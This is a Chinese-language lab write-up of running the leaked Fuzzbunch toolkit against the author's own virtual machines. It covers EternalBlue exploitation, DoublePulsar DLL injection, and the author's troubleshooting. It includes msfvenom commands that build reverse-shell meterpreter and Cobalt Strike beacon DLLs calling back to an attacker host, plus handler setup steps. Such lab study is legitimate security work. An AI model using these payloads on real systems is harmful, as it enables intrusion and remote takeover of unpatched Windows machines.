初识 Fuzzbunch

	武器库历史说明 首先说明一下武器库的关系，我也理了好久。关于 shadowbroker 和 fuzzbunch。 |影子经纪（Shadow Brokers）声称攻破了为NSA开发网络武器的美国黑客团队方程式组织Equation Group黑客 组织的计算机系统，并下载了他们大量的攻击工具（包括恶意软件、私有的攻击框架及其它攻击工具）。 方程式组织（Equation Group）是一个由卡巴斯基实验室发现的尖端网络犯罪组织，后者将其称为世界上最尖端 的网络攻击组织之一同震网（Stuxnet）和火焰（Flame）病毒的制造者紧密合作且在幕后操作。 所以shadowbroker是影子组织公开的工具，其中包括了fuzzbunch&DanderSpritz，不仅如此还有其他工具： windows：包含Windows漏洞、后门、利用工具，等配置文件信息； swift：包含来自银行攻击的操作说； oddjob：与ODDJOB后门相关的文档。 所以针对永恒之蓝的fuzzbunch工具包仅是沧海一粟，其中一部分。 网上的资料良莠不齐，只能自己踩坑摸索，加上最近法律颁布，以后安全圈真大变革，以后又将会何去何从。 Fuzzbunch 这里有几个坑，由于是泄漏出来的版本，github存在极多分支，其中最主要就是shadowbroker 所有工具包的和有仅有fuzzbunch。 shadowbroker： https://github.com/x0rz/EQGRP_Lost_in_Translation https://github.com/misterch0c/shadowbroker【fuzz少组件，没跑起】 fuzzbunch: https://github.com/fuzzbunch/fuzzbunch【暂用这个】 https://github.com/exploitx3/FUZZBUNCH【有流程图，方便理解】 检测工具： https://github.com/countercept/doublepulsar-detection-script 我在一个github找的shadowbroker工具跑的里面的buzzbunch没跑起来，原因后面找到了是 少了一些dll库这些库还不好从网上找，还是后面另开炉灶，下了一个单独的fuzzbunch跑起的 从这目录下找到了那些遗失的windll库。 在网上也找到类似报错，不同git仓库下，确实是不同，毕竟是泄漏版本，坑是巨多。 硬性环境要求 Prerequisites: Windows 7以下 6（必须为32位版本）和pywin32 创建listeningposts目录； 修改xml 按需修改Resources，logs。 |建议修改logs为c:\logs，后续很省事。 功能介绍 目标识别和利用漏洞发现： Architouch Rpctouch Domaintouch Smbtouch 漏洞利用： EternalBlue Emeraldthread Eclipsedwing EternalRomance 目标攻击后后操作： Douplepulsar Regread Regwrite 其插件主要有以下几部分： Exploit 对应Windows目录下的\Exploits 目录，包括对Windows系统和应用软件的漏洞利用程序主要 是针对Windows系统SMB协议和对原Lotus （莲花公司，先已被IBM收购）邮件系统的攻击。 Implant 对应Windows目录下的\implants目录，功能为向目标机器植入指定的dll或exe程序。 Payload 对应Windows目录下的\payloads 目录，该目录中的模块插件主要用于Exploit插件模块攻击成功后 后续的执行操作插件，包括在受害者机器上安装后门、枚举进程、增删改查注册表项、RPC服务等。 Speical 对应Windows目录下的\specials 目录，该目录下Eternalblue和Eternalchampion的是比较新的2个 针对Windows SMB协议的利用程序，但在微软3月的补丁MS17-010中也已经修复。 Touch 对应Windows目录下的\touches 目录，主要功能是探测是否存在指定的漏洞和Exploit插件模块功能 相似但该部分仅仅起扫描探测的作用，不包含漏洞利用功能。 Smbtouch 然后我们通过使用Smbtouch使用smb协议来检测对方操作系统版本、架构、可利用的漏洞。 Eternalblue Attack (win10) : 10.211.55.8 Attack(win7)：10.211.55.9 靶机（win2k3)：10.211.55.4 攻击机不能用Win10，打不成，换win7就好使。还是win7用起来舒服，动画看的也舒服也不消耗过多cpu资源。 不会就help，打?。 use eternalblue启动。 需注意几点 1. 这里记得选1> FB，0是生成一个dll。 2. 重定向那个选项也要注意，不要选yes。参照小丑竟是我自己。 通过返回的信息,可以看出攻击成功,用了不到10秒钟的时间，攻击成功之后并不能直接执 行命令,需要用框架的其他的插件配合。 第一次打成功的截图： 之后重复打就会这样。 攻击成功之后就可以开始使用DoublePulsar插件,DoublePulsar类似于一个注入器,有以下几个功能。 Ping： 检测后门是否部署成功。 RUNDLL：注入dll。 RunShellcode：注入shellcode。 Uninstall：用于卸载系统上的后门。 Doublepulsar 使用DoublePulsar配合上面的Eternalblue完成dll注入。 注意:msf生成的dll注入到win7进程的时候，win7可能会重启。 MSF上线 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.15 LPORT=4444 -f dll > 4444.dll use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp use doublepulsar Bash 第一次打失败了，弹了但是没有完全弹回。选的是SMB，x64，lsass.exe。 遇到的一些问题： 发现msf的payload选错 msf反弹shell的地方没选payload，用的默认的，岂可修，已经好几次这样犯错了。可恶～！ 修改后再无法成功。 但我修改了之后还是没有成功，是不是之前已经注入过了，搞了没有办法重新注入。而且上面永恒之蓝的 打法也是打了一次就记住了，现在也不知道在哪删痕迹，都是陌生的一切。 莫名原因重启之后，一切重来，一切正常。 CS上线 但平时还是cs用得多一点。试试cs的dll效果如何。 |网上言论：“开始采用CS后门dll发现，执行使目标机器蓝屏重启几率较大，成功率较低。” 当然实际情况，内网的基本不出网，所以直接上cs不实用。还是打远程桌面比较香。 网上言论：“开始采用CS后门dll发现，执行使目标机器蓝屏重启几率较大，成功率较低。 cs—dll盲目操作导致报错 win7只要一打cs的dll，秒报错。 msf转换payload 参考链接：http://www.dark5.net/blog/2019/06/26/Cobalt-Strike-DLL用于永恒之蓝注入/ msfvenom -p generic/custom PAYLOADFILE=./beacon.bin -a x64 --platform windows -f dll -o csmsf.dll 注意cs的payload不能选windows那个，要选raw格式的dll。 小丑竟是我自己 打完cs之后，我发现上线的竟然是自己的攻击机Win7，我觉得不太对，IP都对着 怎么这样 重新打了一遍发现。小丑竟是我自己，自己上线自己。 发现之前的设置当中，有这么一步设定。 win2k8无法上线 [没解决] https://beta.4hou.com/technology/12265.html 方程式可以上线，虽然报错，依旧上线。 DllOrdinal默认值为1，ytb演示视频为5。修改也没用。 嵌入类型：https://www.yxxtxbx.com/watch?v=B8kkHAa_ntk&t=248s DoubleSpritz DanderSpritz是后渗透工具，伴随武器库一同泄漏，可配合fuzzbunch使用。 在fuzzbunch攻击成功，在受害者机器上植入木马后，可以通过DanderSpritz对受害者机器进行远控制和操作。 网上说明文档极少，都是大伙踩过坑的辛酸泪：https://github.com/francisck/DanderSpritz_lab 首先准备好合适的jdk版本环境。 https://3gstudent.github.io/NSA-DanderSpiritz测试指南-木马生成与测试 不会，坑太多，溜了溜了。 不会，坑太多，溜了溜了。 不会，坑太多，溜了溜了。 17010莫名修复排查 本来一直存在17010的靶机，今天突然打不成了，我是惶恐不安呀，经过几番排查，的亏快照习惯好 恢复快照排查，发现后续安装软件的时候，存在这几个补丁。 卸载补丁。 nice，不亏耗费我快2小时，几个虚拟机疯狂调试，逐渐排查问题，关闭自动更新。over。